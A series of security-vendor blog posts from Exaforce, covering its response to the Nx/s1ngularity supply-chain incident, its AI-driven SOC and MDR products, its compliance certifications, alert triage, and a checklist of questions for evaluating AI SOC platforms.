Specifically, it flags repositories matching the malicious repository based on the naming convention used, which attackers used to publish exfiltrated secrets and stolen credentials. By surfacing these high-risk patterns early, the rule enables teams to quickly review, validate, and remove unauthorized repositories before they can be weaponized.

Exaforce risk rule to detect malicious repositories

Rapid and simple investigation

Exabot Search also allows analysts to quickly check for the potential impact of events like the Nx supply chain attack across your entire environment. You can search for IoCs with a query such as `Can you go through this blog about a github vulnerability: https://www.stepsecurity.io/blog/supply-chain-security-alert-popular-nx-build-system-package-compromised-with-data-stealing-malware. Please extract the indicators of compromise and tell me if i am impacted in my environment?`. Exabot Search will correlate events from different sources and return results in a structured, easy-to-read format. This reduces the time needed to determine whether an incident or new threat affects your systems.

See the workflow in the demo below:

Final thoughts

The s1ngularity incident is a sobering reminder of how modern threat actors are innovating with AI tools and exploiting supply-chain trust. Exaforce’s swift response, verifying zero customer exposure and proactively enhancing detection mechanisms, demonstrates how vigilance and responsive action can turn a potential disaster into a controlled event. By staying alert, preparing risk-based detection rules, and monitoring behaviors, not just packages, we ensure that even next-generation attacks are caught early.

August 26, 2025

Introducing Exaforce MDR: A Managed SOC That Runs on AI

An MDR service that uses agentic AI and expert analysts at every stage of the SOC lifecycle, so you get faster response, better coverage, and a SOC that understands your business.

Security operations today are caught in a painful paradox. For organizations without a Security Operations Center (SOC), building one from scratch is costly, time-consuming, and resource-intensive, requiring headcount and tooling that many simply can’t afford. For those that already have a SOC, the challenge shifts to scale: every new cloud service/tool or identity system you adopt adds sources to monitor, detections to maintain, and alerts to investigate. A survey found that 65% of analysts are at risk of churn due to burnout from existing SOC environments, putting institutional and technical knowledge at risk and leaving organizations more vulnerable to noise, blind spots, and missed threats. The result is the same whether you’re starting from zero or operating at scale.

Agentic MDR for any stage of maturity

With Exaforce’s Managed Detection and Response (MDR) service, we’re addressing both ends of that spectrum. Built on our full-lifecycle Agentic SOC platform, MDR brings AI-powered detection, triage, investigation, and response to customers in days, not months. For teams without a SOC, it delivers 24/7 monitoring, response, and tailored protection without the need to hire an in-house team. For established SOCs, it acts as a force multiplier, absorbing noise, filling coverage gaps, and freeing analysts to focus on the incidents that matter. By combining our AI agents, called “Exabots,” with experienced analysts, we’ve created an MDR that is always on, responds faster, the handoff between human and machine is seamless, and the learning curve is virtually eliminated.

Closing the MDR context and coverage gaps

Most MDRs face two persistent challenges: they drown in false positives and lack the business context needed to separate routine activity from real threats. Exaforce eliminates both. From day one, our Exabots ingest your environment’s configurations, identities, and past alerts, so the platform understands full historical context and provides that to our analysts. This way, they know not just what’s unusual, but what’s unusual for you, and that knowledge is retained and passed forward.

We also expand coverage to blind spots SIEMs often miss, such as source code management systems like GitHub and collaboration platforms like Google Workspace. Our MDR analysts are trained in these systems and know how to follow up effectively, ensuring overlooked attack surfaces don’t become the weak link.

Smarter triage and deeper investigations

Every alert, whether from Exaforce detections, your cloud tools, or a third-party SIEM, is triaged with AI-driven reasoning. False positives are removed, signals are enriched with identity and behavioral context, and only high-confidence alerts reach our analysts. This reduces noise for customers and frees our team to focus on the incidents that matter.

When investigations are needed, Exaforce accelerates them with automated evidence gathering, contextual linking across identities and systems, and powerful data exploration for threat hunting. Analysts can quickly build timelines, trace attacker behaviors, and guide containment in minutes instead of hours, leading to faster, more confident responses.

Response that’s tailored, transparent, and fast

Speed isn’t our only advantage. We partner closely with each customer to tailor protections to their priorities. Our Exabots confirm suspicious activity directly with end users via Slack or Microsoft Teams, loop in managers when needed, and even automate actions like password resets, MFA resets, or session terminations through integrations with your identity provider. Whether handled by a human in the loop or executed autonomously by Exabot, every action is backed by context, transparency, and accountability. Customers also have full access to the underlying Exaforce platform at all times to see what we see, making it easy to have informed conversations about security posture and continuous improvement.

Bringing world-class SOC capabilities to everyone

Because our MDR is AI-enabled at every step, it’s not limited to enterprises with deep pockets and large teams. We’re democratizing access to world-class SOC capabilities for companies of all sizes. Now, even a small team can have around-the-clock protection and the confidence that someone is “watching the store” while reclaiming critical time needed to focus on key business needs. And for larger teams, MDR becomes a way to absorb the operational load without losing control over strategy, visibility, and transparency

Ready in a day, delivering value immediately

With Exaforce MDR, you’re not getting an expensive notification service that dumps alerts back into your queue. You’re getting a partner that investigates, contextualizes, and responds better, faster, and with a depth of understanding that feels like we’re sitting next to you. We’re easy to onboard, and can start delivering value within the same day. The only thing left for you to decide is what you’ll do with the time and peace of mind you get back.

Want to learn more? Talk to an MDR specialist today.

August 26, 2025

Meet Exaforce: The full-lifecycle AI SOC platform

Launching the Exaforce agentic AI SOC platform: full-lifecycle security operations with automated detection, triage, investigation, and response. Empower small teams to create a SOC or enable mature SOCs to scale coverage and speed without increasing headcount

For many organizations, building and running a Security Operations Center (SOC) presents an impossible choice. If you’re a small, nimble security team setting up your program, you can either invest heavily in tools, hire detection engineers and analysts, or outsource entirely to an MSSP/MDR. Both options have trade-offs: one demands headcount and tooling you may not have, the other surrenders control with unclear outcomes. If you already have a SOC, the challenge is different but just as pressing. Every new service or cloud workload you deploy adds sources to monitor, detections to maintain, and alerts to investigate, and you’re unlikely to get the budget to match this increase with headcount. The result is blind spots, missed alerts, and analyst burnout.

We believe there’s a better way. After founding Exaforce, we set out to build a full-lifecycle AI SOC platform, bringing agentic AI to every stage of security operations, including threat detection, alert triage, investigation & threat hunting, and response. Available as a SaaS platform or a fully managed MDR service, Exaforce is designed to help teams work faster, more accurately, with greater confidence, and with much lower TCO compared to traditional SOC tooling and services.

Why a full-lifecycle AI SOC matters

Present security operations tooling, even those attempting to bolt on AI capabilities, were not built for today's IaaS, SaaS, Identity, and AI-workload attack surfaces. Stitching together signals from modern application stacks takes time and expertise most SOCs can't spare, especially smaller teams getting started or mature SOCs already stretched thin.

Exaforce solves this with Exabots, task-specific AI agents, and an Advanced Data Explorer. Exabots operate in autopilot or copilot mode, augmenting all critical SOC tasks. The Advanced Data Explorer empowers SOC teams to easily query and investigate beyond traditional SIEM event data, combining logs, identity, configuration, code context, and threat intelligence data, and makes it available through natural language queries or a Business Intelligence-like interface with filters and charts. This modern architecture, combined with the data engineering and transformation work we are doing, significantly reduces storage costs for IaaS and SaaS logs that account for the majority of log volume in modern environments. Both capabilities are powered by a purpose-built multi-model AI engine blending deep learning, machine learning, knowledge graphs, and LLMs for comprehensive reasoning.

The result is high-accuracy detections, context-rich triage, and accelerated investigations, helping smaller teams launch a capable SOC in hours, enabling mature SOCs to operate faster and more accurately, all while reducing total cost of ownership (TCO).

Exaforce’s multi-model AI that powers the platform

Detect and stop more cloud threats

Exaforce delivers out of the box threat detections across critical IaaS, SaaS, and identity environments. We cover AWS, GCP, Google Workspace, GitHub, Atlassian, OpenAI, and more that go beyond UEBA techniques.

Building effective UEBA and anomaly detection using legacy tooling is no small task. It requires a deep understanding of the services you are protecting and pertinent entities to model accurate detections. Most large enterprises attempting to do this well staff entire teams of detection engineers and data scientists. Even still, existing anomaly detection and UEBA approaches weren't built for cloud identities and resources, and tend to generate excessive false positives. 

Exaforce instead combines advanced anomaly detection with LLM reasoning capabilities. Anomalies become "interesting signals" that LLMs stitch together with business context and reasoning specific to a customer's environment. Exabot can reason with configuration data, code repositories, identities, and threat intelligence, not just event data.

The result is highly accurate, actionable threat detections that provide coverage for even the smallest SOC teams and fill blind spots for mature SOC teams grappling with the ever growing number of new services they have to monitor. 

A threat finding correlated across IdP and SaaS services, showing potential account compromise with data exfiltration

Automated triage beyond Tier 1 analysis

When alerts arrive from Exaforce detections, cloud-native tools, or your SIEM, Exabot Triage performs investigations that go far beyond typical Tier 1 analysis. Unlike traditional triage that relies on point-in-time events, Exabots leverage deep environment knowledge and our anomaly detection engine to reason about behavior over time.

Exabots correlate threats across multiple detection sources. They create complete attack narratives that would otherwise appear as isolated alerts. Each investigation enriches alerts with identity context, peer baselines, and historical outcomes before issuing clear verdicts of False Positive or Needs Investigation.

When users hold the most accurate context, Exabots reach out directly. This saves countless hours of manual verification that plagues most SOC teams. Natural-language Business Context Rules capture your business priorities, fine-tuning AI analysis with knowledge bespoke to your environment, reducing false positives for activity considered normal in your environment.  

When performing these actions, Exabots operate in autopilot or copilot modes. Analysts can review the analysis while asking follow-up questions, all within the same platform. No context switching to SIEM is required to retrieve additional information to aid in an investigation.

Exaforce auto-triaging a third-party alert based on the added context directly from the source and history

Faster investigations and threat hunting

In most SOCs, investigations face a fundamental data problem. Without a SIEM, security teams search across multiple data sources with different retention policies, resulting in insufficient data to conduct an investigation and the daunting task of stitching information together when the data is available. With a SIEM, they're limited to event data and must write complex queries to answer basic questions such as which entity performed what actions, and what was the impact.

Exaforce's Advanced Data Explorer goes beyond traditional SIEMs. It unifies events, identity, configuration, code context, and threat intelligence with rich relationships in a purpose-built user experience. The data is queryable via natural language search or through a business intelligence-like interface that enables true data discovery and visual querying. The data is stored in a fast in-memory database that enables real-time investigations, while a data warehouse supports longer-term analysis.

Business intelligence-grade investigation view, making it easy to filter to relevant sessions and details

Similarly, threat hunting becomes effortless using the data explorer and Exabot Search. For example, you can ask Exabot Search to retrieve information on known exploits from the web, prompt the system to extract indicators of compromise, then search for those indicators across your entire environment, all via natural language.

Exabot Search makes threat hunting as easy as asking questions in natural language and it does the hard work of querying complex data

By combining Advanced Data Explorer with Exabot Search, teams overcome traditional investigation barriers and gain visibility beyond what a SIEM can deliver.

End-to-end response workflows

Exaforce goes beyond ticket creation, integrating with Slack and Teams to confirm activity with users and managers, and with identity providers like Entra ID to automate password resets, MFA resets, or session terminations. Analysts can respond manually or allow Exabot to act autonomously, saving precious analyst time.

Every case is automatically populated with the related findings, resources, and sessions, so context flows seamlessly from detection to action. Built-in case management and two-way sync with ticketing systems like Jira keep collaboration smooth and reduce handoff delays, accelerating containment and remediation.

Exaforce integration with Entra ID to automate MFA and password resets directly from a finding

Proactive risk management

Security is also about preventing threats and the posture of an asset can assist in the investigation of an alert. Exaforce continuously assesses posture risks across identities, cloud resources, and SaaS applications, such as misconfiguration risks and unused permissions. These insights highlight the highest-impact risks so teams can act before attackers can exploit them. This same context is added as context to threat detections and strengthens alert triage and investigations done by Exabots, improving accuracy and prioritization.

View of prioritized risk findings across data sources

Get started with Exaforce

Our mission is to boost SOC productivity and accuracy by 10x with AI, helping small teams stand up a world-class SOC without friction and enabling existing teams to scale coverage, speed, and quality of detection and responses without scaling headcount.

Whether you want to augment an existing SOC, build one from scratch, or offload operations with MDR, Exaforce brings agentic AI to the entire security operations lifecycle, not just Tier-1 workflows. Request a demo to see how quickly you can go live and close the loop from detection to response.

August 21, 2025

Building trust at Exaforce: Our journey through security and compliance

How Exaforce made trust a launch requirement by embedding security and compliance from day one

Why compliance matters

Let’s face it, most startups treat compliance like airplane wings; they build the whole plane, get ready for takeoff, then realize they need to bolt them on while already rolling down the runway.

We took a different path.

From day zero, compliance was part of the blueprint. While engineering built our Agentic SOC platform, the entire company worked hand in hand to ensure our security, governance, and operational practices were aligned with the most rigorous standards like SOC 2. Compliance was ingrained from the start, woven directly into how the platform was architected and how we operate every day.

Our earliest design partners came from the front lines of regulated industries, healthcare, finance, and life sciences. These weren’t just logo-chasing partnerships. They were formative relationships shaping our platform’s core features. And if we wanted them to stick around and trust us, we had to speak their language: compliance.

So we got to work. No shortcuts. No delayed timelines. Just a stubborn commitment to doing things right, from the start.

Fast forward: we’ve now locked in SOC 2 Type I & II, ISO 27001, PCI DSS, HIPAA, GDPR, and USDP. And we’re in mid-observation for HITRUST e1. And the best part? We hit many of these milestones ahead of schedule.

This is a startup survival guide told by the guy who wrote every policy, chased every screenshot, and occasionally bribed engineers with craft beer to hit compliance deadlines.

Our vision: Compliance by design

Before the first customer onboarded. Before the first alert fired. Before our platform even launched, we were already building with compliance in mind.

Why? Because we wanted to:

  • Enable regulated industries to adopt Exaforce from day one.
  • Create enterprise-grade trust in our platform and company.
  • Bake security and governance into our architecture, not bolt it on later.

We aligned early with cloud-native frameworks like SOC 2 and ISO 27001, while preparing for partner-driven frameworks such as USDP, GDPR, HIPAA, and HITRUST.

The roadmap: From zero to certified

Our certification timeline

The leadership behind the mission

"Compliance isn't just a milestone. It's a mindset. It's how we operate."
— Team Exaforce

We don't treat compliance as a checkbox, nor is it the responsibility of a single person or department. It's a company-wide principle, woven into our culture of openness, agility, and transparency.

From day one, our leadership team committed to integrating security and compliance directly into our operational DNA. But the real strength of our program comes from our people: engineers, SREs, product leads, operations, and business teams who consistently go beyond expectations. Whether it is adjusting deployment pipelines, reworking onboarding flows, or documenting new processes, everyone leans in.

Collaboration as our foundation

Rather than compliance being enforced from the top down, it became a shared initiative. This unique culture meant that when compliance controls required change, the conversation wasn’t about resistance; it was about how to make it work faster, better, and cleaner. We strove to not only meet the bar but also to iterate on how it could be raised without adding unnecessary friction.

We partnered with well-known, trusted industry experts for audits, assessments, and risk validation. Their guidance helped us refine our approach, confirm we were meeting the highest standards, and challenge us to raise the bar even further. Combined with our internal expertise, this collaboration allowed us to build a program that’s both audit-ready and operationally seamless.

Platforms that powered the process

To scale and automate compliance in a fast-moving startup, we leaned into a robust and cloud-native toolset. We built our compliance foundation on proven, cloud-native platforms for policy management, automation, and access control, the same kinds of tools used by leading enterprises. These systems gave us a single source of truth for evidence, automated monitoring of controls, and streamlined onboarding and offboarding.

But the most important platform in the mix was our own. We used the Exaforce Agentic SOC Platform internally to detect, triage, and investigate anomalous activity, not just for security, but to meet and validate compliance controls in real time. We proved that the capabilities we deliver to customers can stand up to the same scrutiny we face ourselves.

“We drank our own champagne. Our platform wasn’t just built for others, we used it internally to prove it works.”
— Team Exaforce

Embedded into operations

By leveraging our stack and working as one team, compliance became an ongoing habit, rather than a quarterly panic. Tasks are tracked automatically. Alerts are triaged through Slack. Access reviews are visible and documented. When an audit request comes in, we already have the evidence.

This embedded model is what makes Exaforce different. We treat compliance as a competitive edge, a trust enabler, and an extension of our platform's mission to make cloud security more intelligent.

Lessons from the trenches

Real challenge: No access = No evidence

Because we operate under least privilege access, there were many times I didn’t have direct access to the systems I needed evidence from. Chasing SREs during crunch time? Let’s just say I had to get creative, offering bribes (beer) or joking about dire consequences!

Biggest win: No audit findings

When auditors returned clean reports (no findings, no changes, no redo), that was a moment of deep pride. Another highlight: beating internal certification deadlines despite product sprint pressure.

Cultural shift

Convincing a fast-moving startup team to complete onboarding, read policies, and watch training videos wasn’t easy. But today, compliance is just something our team does—and that mindset is a win.

Building a culture of compliance

At Exaforce, compliance is a mindset woven into every layer of how we operate. Our approach blends automation, culture, and accountability. Every new team member completes training videos and policy acknowledgments in their first week, automatically tracked in Vanta, and reinforced through onboarding flows in GitHub. Slack-integrated bots and emails deliver timely reminders for compliance tasks. gently guiding staff toward full alignment without interrupting productivity. Our engineering culture prioritizes secure coding practices, internal peer reviews, and approvals of policies and architecture. Finally, exits are managed with the same precision as entries, ensuring no loose ends across systems or access.

These are deep operational habits. And when auditors come knocking, the difference between our compliance culture and surface level changes is clear.

Drinking our own champagne: Agentic AI at work

We use our own Agentic SOC Platform internally for detection, triage, and alerts. This has the double benefit of learning from our own use and providing real operational value.

Example 1: Dormant account reactivation

Our system caught a dormant user in a design partner’s account suddenly becoming active. Turns out it was a contractor account that should’ve been disabled. We escalated and helped them shut it down before anything major happened. If we internally enforce processes in compliance, our platform flags similar situations for us.

Example 2: Brute-force login attempts

For another partner, we flagged suspicious activity across multiple accounts. The first time, they disabled the account. The second time, they revamped their MFA policies. Detections like these allow several compliance controls to be fulfilled.

That’s the power of an agentic AI SOC platform built to cover detections, triaging, investigations, and response.

Value delivered before launch

Compliance was always a launchpad for us. Before we even shipped our product, our security posture was already opening doors. Here's what it meant in practice:

Frictionless security reviews
We cleared complex vendor assessments early, turning red flags into green lights for our design partners and prospects.

Accelerated procurement cycles
Buyers saw a mature, secure partner, not a startup with "coming soon" promises.

Stronger first impressions
Our Security Trust Center impressed stakeholders and showed how seriously we take the protection of their data.

Built-in buyer confidence
Compliance gave us credibility, even in regulated industries, from day one.

By integrating security and compliance into our go-to-market motion, we didn’t just meet expectations — we exceeded them before launch.

Looking ahead

Our commitment to trust and transparency continues to evolve beyond our initial certifications.Next on our roadmap are advanced frameworks like ISO 27017, ISO 27018, and the ambitious FedRAMP program. We’re investing in smarter, more scalable ways to maintain compliance, reducing manual overhead while increasing reliability. A unified, public-facing hub where customers and partners can access our policies, certifications, and security posture at any time.

Final thoughts

If you’re a CISO, compliance lead, or security-conscious buyer, we built this for you. Exaforce is a compliant, intelligent, and trust-first cloud security partner.

We took the hard road first so our customers could go fast later.

Let’s secure the future together.

August 7, 2025

Fixing the broken alert triage process with more signal and less noise

A look at how AI is changing the SOC triage process from automated false positive classification to clearer handoffs and deeper context for Tier 2 and 3 analysts.

A day in the life of a SOC analyst on triage duty

Imagine starting your workday faced with a barrage of security alerts, each signaling a potential threat to your organization's data and systems, but only if you find the needle in the haystack of findings. As a triage analyst, your first task is to monitor these incoming alerts from security information and event management (SIEMs), endpoint detection and response (EDR), intrusion detection systems (IDS), email security, and more. And those are just the security tools. As an analyst, you should also make sure to dig into the raw logs from network tools, identity providers, and more. Visibility across endpoints, networks, cloud platforms, and SaaS applications is critical, yet managing this extensive data can be overwhelming.

Depiction of triaging in a simplified SOC scenario

After intake, the initial review is essential. Analysts spend a considerable amount of their time verifying alerts to filter out false positives, confirming log sufficiency, and ensuring quality evidence for deeper investigations. Prioritization follows, classifying each alert by severity (critical, high, medium, or low) and priority based on urgency, impact, and asset sensitivity.

Enriching these alerts through additional context and correlation is another time-intensive step. Analysts must gather more information from various systems and logs, cross-reference affected entities against known user behavior or prior incidents, and identify patterns that indicate larger attack campaigns or benign events like the CEO traveling. This process can be tedious and error-prone due to disconnected tools and inconsistent data formats.

Incident classification, basic response, containment, and escalation require meticulous documentation and clear communication among teams. Ensuring a smooth handoff between Level 1 analysts performing initial triage and advanced Level 2 or 3 analysts is often a challenge in traditional SOC processes. Most often, AI is used to automate repetitive Tier 1 work; however, significant bottlenecks and stress arise from alert escalation to Tier 2 or Tier 3 analysts, where a lack of expertise and insufficient data lead to poor contextualization.

Challenges facing triage analysis today

Triage analysts face several persistent challenges that hinder their efficiency and effectiveness. Existing solutions (SIEMs, SOARs, etc.) are not designed to handle these challenges, instead exacerbating the situation by becoming increasingly noisy and rigid:

  • High false positive rate wastes time: Tier 1s must wade through alerts that are often irrelevant, up to 99% in some cases, leading to alert fatigue and time loss.
  • Fragmented tools make triaging and enrichment slow and manual: Tier 1 analysts must piece together context from disconnected security and non-security systems, correlating logs, enriching alerts, and investigating manually, all of which slows response and increases error rates.
  • Unrealistic skill demands on junior analysts: Triaging often spans cloud, identity, endpoint, Kubernetes, SaaS, and more, requiring broad technical knowledge that's hard to expect from entry-level talent.
  • Lack of feedback stifles improvements: Without feedback from downstream teams or visibility into case outcomes, Tier 1 analysts struggle to improve accuracy over time. Similarly, Tier 1 analysts can struggle to provide quality feedback upstream to improve detections for fear of not providing good or accurate analysis.
  • Increased pressure from understaffed teams: Staffing gaps push more alerts onto fewer shoulders, compounding all of the above issues. For many organizations, this alone can push having a SOC out of reach.
Challenges across the triage process break down the expected model

These challenges underscore the critical need for a more streamlined, intelligent approach to triaging alerts in the SOC, not just for the high-volume, routine work of Tier 1, but for the tough, often-escalated cases that traditionally land with Tier 2 and Tier 3.

Transforming triage with AI-powered automation

Recent advancements in AI (GenAI and ML) create an opportunity to fundamentally change the triage process and the role of analysts in triaging. We built Exaforce from the ground up to leverage these advancements to improve the whole SOC lifecycle, including the triage, investigation, and response processes.

Reducing noise with automatic false positive reduction

Exaforce reduces noise faced by analysts by automatically identifying and marking false positives. It integrates logs, configurations, identities, threat intelligence feeds, and even code repository configurations to provide highly accurate initial analysis. Leveraging multiple AI techniques, Exaforce can further reduce the alert volume by deduplicating like alerts and chaining related findings, even across systems and tools.

Attack Chains string together alerts from different sources into one full story

Analysts receive clear summaries outlining the reasoning behind each decision, encompassing details about the principal, understanding of the user and entity locations, all actions taken during the session, details about the resource, and deep behavioral analysis of users and their peers’ behaviors. For example, when AWS GuardDuty flags suspicious user activity, Exaforce's triage agent evaluates multiple indicators like user identity, session details, location of the user, and resource naming conventions to discern if it’s a genuine threat or a benign event such as a test scenario.

AWS GuardDuty alert that was automatically triaged and marked as a false positive based on user analysis

Quick workflows with automated human-in-the-loop

This is where Exaforce, as an integrated platform, blurs the lines between triage and response. Exaforce automates analyst workflows through integrated channels like Slack to quickly confirm suspicious behaviors directly with users and managers. This reduces analyst burdens significantly, eliminating manual investigative tasks for straightforward confirmations, accelerating response times, and allowing analysts to concentrate on more complex issues.

Automated workflow confirmed with a user and their manager that suspicious activity was safe

Continuous learning and contextual customization

Exaforce learns continuously by incorporating historical context and analyst feedback. Previous alerts that were deemed “Needs Investigation” and moved to “False Positive” will be added to the context for all subsequent alerts’ analysis, improving the accuracy of the triage. When an alert that was first tagged Needs Investigation is later cleared as a False Positive, that outcome becomes part of the AI history, refining how future alerts are scored. The engine also cross‑references the results of similar alerts, even those that ultimately followed the original resolution, to give every new alert a richer, context‑aware assessment.

Organizations can also add customized Business Context Rules directly into the platform, tailoring the triage and response processes specifically to their operational and risk profiles, resulting in increasingly accurate and relevant threat detection. For example, at a leading biotechnology provider, the business context includes a list of known-safe VPN gateway IPs. When users switch between these IPs, such as between corporate VPN gateways, Exabots recognize this behavior as expected, rather than flagging it as impossible travel, reducing false positives without compromising detection fidelity.

Business Context Rules are natural language details about your environment used during triage analysis

Enhanced alert contextualization and investigation

Exaforce automatically enriches alerts by correlating context across sessions and systems, answering critical investigation questions typically requiring expert analysts with knowledge of both security, cloud, DevOps, endpoints, and more. This allows it to deeply contextualize any alert across IaaS services like EKS, SaaS services like Google Drive, version control systems like GitHub, and more in only a way that an expert in the field could. All of this is summarized in highly digestible ways, while the data behind the summaries remains available when the alert is passed on to the investigation team. This significantly simplifies and accelerates the investigation of alerts that aren't automatically triaged.

Detailed questions and answers behind the automated analysis

Empowering teams of all sizes

Exaforce democratizes advanced SOC capabilities, empowering even understaffed or smaller teams to achieve high-level security operations. Automating complex triage processes eliminates much of the burden on Tier 1 analysts and unblocks the rest of the SOC process. Through this, Exaforce allows organizations with or without dedicated SOC teams to maintain robust, proactive security postures.

Leveraging AI, the whole triage process can be improved

Triaging, without the turmoil

Triage shouldn’t be the most tedious part of a SOC analyst’s job, but today, it often is. High false positive rates, time-consuming investigations, fragmented tools, and broken feedback loops make it hard for Tier 1 through Tier 3 analysts to work efficiently or improve outcomes over time. And with handoffs between tiers introducing delays and inconsistencies, even the best triage efforts can break down before real response begins.

Exaforce changes that by embedding triage into an agentic SOC platform. It automates enrichment, prioritization, and contextualization while preserving shared insights across teams and tools. This alleviates the back pressure of high false positives by triaging them automatically, and automates enrichment across tools and platforms with the knowledge of the most skilled analyst, reducing the burden on understaffed teams and improving downstream and upstream processes. Instead of treating triage as an isolated step, Exaforce makes it the foundation of a continuous, AI-driven workflow, one where context flows naturally, feedback loops stay intact, and analysts are empowered to act faster and smarter. Because triage alone doesn’t make an AI SOC, but the right platform with the right transformational process can.

July 16, 2025

Evaluate your AI SOC initiative

A maturity mapped question framework to benchmark AI SOC platforms on detection, triage, investigation, response, and service quality.

Selecting the right AI-powered Security Operations Center (SOC) solution is no longer just about comparing feature lists. It’s about determining whether a platform (and the team behind it) can truly elevate your organization’s security capabilities, streamline analyst workflows, and adapt alongside an ever-evolving threat landscape. The following question set is designed as a comprehensive evaluation guide, helping you probe the technical depth, operational maturity, and business alignment of any AI SOC initiative you’re considering.

Every vendor is presenting their own “ultimate guide” to evaluating AI SOC solutions. We recognize this can make it difficult to cut through the noise. That’s why we’ve worked hard to make this guide as unbiased and universally useful as possible, grounded in real operational needs, no matter which platform you’re considering.

Use the questions in this guide to reveal how different solutions deliver on detection accuracy, automation, and managed-service quality. Whether you’re building a SOC from scratch, tuning a mature program, or vetting an MDR partner, this framework exposes strengths and gaps that matter to your risk profile. Let your current maturity level set the bar: the table below maps that maturity to the way you should use the questions for each section for every phase of the SOC lifecycle.

Detection

  • Can the AI SOC tool generate its own, accurate detections that stand alone or augment ingested SIEM findings?
  • Does the platform allow you to create custom detections? 
  • Does the system triage its detections with context specific to your environment to increase the fidelity of detections?
  • Can the system create detections from the investigations you are performing?
  • Can the system extract Indicators of Compromise (IOCs) and create detections from reading about known exploits?
  • Does the platform require extensive customization and tuning, or can it automatically learn and adapt to my organization’s unique environment, behavior patterns, and business context?
  • Does the platform provide end-to-end coverage across Tier 1 to Tier 3 analyst workflows to minimize handoff issues and preserve investigation context throughout the incident lifecycle?

Triaging

  • How does the platform incorporate business-specific context (e.g., asset criticality, user behavior, environment) to assign severity, prioritize alerts, and reduce false positives?
  • How does the platform automate triage, alert routing, and response based on severity and context?
  • Can the system include user feedback, if applicable, when triaging an issue?
  • Does the system learn from past triaged alerts to improve future outcomes? If so, what information does it factor into for past analysis?
  • Can I clearly see the rationale behind AI-driven decisions and access a full audit trail of actions, such as marking a finding as a false positive, for accountability and review?
  • Does the platform map its detections to the MITRE ATT&CK framework, and how is this presented to accelerate understanding and response?
  • Does the platform support conversational interaction during and after triage, allowing analysts to ask follow-up questions and retrieve insights in natural language?
  • Can the system correlate multiple alerts across other data sources as part of the triage process to determine a wider-scale impact?
  • What is the Mean Time to Investigate (MTT) for the agent. Consider MTTI as the time interval between alert ingestion and a recommendation/disposition from the system on the alert.  

Investigation

  • Does the system perform out-of-the-box parsing, normalization, deduplication, and enrichment of data, making it easier for analysts to understand, navigate, and investigate alerts effectively?
  • Does the platform provide meaningful context and explanations that go beyond what a typical analyst would already know, such as connected identities, chronologically close events across systems, threat intelligence enrichment on IPs, effectively educating users about alerts, tools, and behaviors involved?
  • Does the platform apply advanced analysis techniques such as baselining, identity resolution, and risk scoring to help prioritize alerts and surface meaningful patterns across users, assets, and behaviors?
  • To what extent can analysts complete investigations within the platform, and how often do they need to pivot to external tools or data sources?
  • Does the platform provide clear, contextual summaries of alerts and events, including rationale, risk level, and enriched indicators, to aid investigations and educate analysts beyond standard details?
  • Does the platform allow for seamless investigative pivots from an initial finding, enabling deeper exploration through follow-up questions and queries?
  • Does the platform support flexible investigative workflows, including hypothesis-driven threat hunting and insider threat analysis?
  • Does the platform support real-time collaboration between analysts and AI agents, including shared workspaces, notes, and timelines to document investigations and findings?

Response

  • Can the platform trigger automated, no-code response workflows, like resetting MFA or disabling sessions, based on alert severity and business context?
  • Does the system require building static playbooks, or can you describe to the system, in a prompt, what actions need to be performed under what circumstances?
  • Does the solution support human-in-the-loop decision-making, with flexible business rules that determine when to involve users, managers, or analysts in response?
  • Can the platform prioritize and execute response actions based on contextual risk scores, taking into account user identity, asset exposure, and behavioral anomalies?
  • Does the platform provide a real-time, multi-user Command Center to coordinate response efforts across SOC, IT, and other teams, with full timeline, notes, and next steps?
  • Does the system integrate with existing SOAR technology to leverage existing response workflows?

Services (if choosing an MDR service)

  • How does your provider integrate with your data sources? Is it API based integration? 
  • Does your MDR require you to have a SIEM for log aggregation and auditability?
  • What is the time to value? From onboarding to when you start noticing the MDR provider understands your environment and provides high fidelity escalations.
  • Do I have 24/7 access to the underlying platform for visibility, investigation, and collaboration, even outside of MDR interactions?
  • What integrations does the MDR provider have with existing SOC tooling: SIEM, SOAR?
  • Does the provider offer true 24/7 managed detection and response (MDR) services, including continuous monitoring, triage, and escalation?
  • Does the team include security experts with deep experience across IaaS, SaaS, and modern infrastructure environments?
  • What is the expected responsiveness of the MDR or support team for questions, escalations, or incident handling, and is this backed by SLAs?
  • Are regular check-ins or service reviews part of the engagement to ensure alignment, improvement, and evolving threat coverage?

Architecture and Deployment

  • Is the solution offered as a SaaS deployment model to simplify operations and ensure predictable costs?
  • Does the platform support single tenancy, the ability to deploy in your cloud, and data sovereignty to ensure data isolation, meet compliance requirements, and maintain control over where data is stored and processed?
  • Does the platform support multi-level organizational hierarchies and granular role-based access control (RBAC) to effectively manage MSP environments and complex enterprise structures with multiple business units?
  • Does the platform meet your required compliance standards, such as SOC 2, ISO 27001, GDPR, or HIPAA, and can it provide documentation or certifications to verify compliance?
  • If I share data with the platform, is that data used to train underlying models, and what safeguards are in place to prevent unintended exposure or misuse?
  • What mechanisms and safeguards are in place to ensure the platform consistently delivers deterministic and accurate results?
  • How effectively does the platform present key operational metrics, such as MTTI, MTTR, and MTTC, in a clear and actionable way for tracking SOC performance?
  • What is the typical time from onboarding to when the platform begins generating reliable, actionable alerts, including any necessary learning or tuning period?

Onboarding and setup

  • Does the platform offer API based integrations into your data sources?
  • Can the platform ingest and process data at the volume and velocity required to match the scale of your environment, especially your IaaS and SaaS logs, without performance degradation?
  • Does the platform offer native integrations with key security and IT systems, beyond just SIEMs, including identity providers, IaaS, SaaS, endpoint, email, SASE, and threat intelligence feeds, to provide unified visibility and context?
  • How long does it take the system to establish baselines on known good behavior in the environment?
  • What kind of support services are offered, and do they include experienced personnel and clearly defined SLAs to ensure timely and effective assistance?
  • How involved and collaborative is the team during onboarding? Do they actively guide setup, data source integration, and platform tuning?

Finding the right AI platform for your SOC

Choosing an AI-driven SOC platform is a strategic decision that will shape your security operations. Armed with the questions in this guide, you can cut through buzzwords, validate real-world capabilities, and hold platforms accountable for measurable outcomes, whether it’s reduced MTTR, lower false-positive rates, or demonstrable cost savings. As you compare responses, look for consistency between the platform’s stated features, the support team’s processes, and evidence from proofs of concept.

Ultimately, the right partner will meet your technical requirements today while demonstrating a clear roadmap for tomorrow’s threats and architectures. Prioritize solutions that combine strong native detection with transparent AI reasoning, seamless analyst workflows, and, if you need it, collaborative MDR expertise. When those elements align with your business goals and risk profile, you’ll have the confidence that your SOC is ready not just to keep pace with attackers, but to stay a step ahead.

July 10, 2025

One LLM does not an AI SOC make

LLMs have the potential to improve SOC processes, but they’re not enough on their own. This blog explores why AI SOCs need pre-processing and a new design to add value.

Contributed by: Andrew Green, Enterprise IT Research Analyst

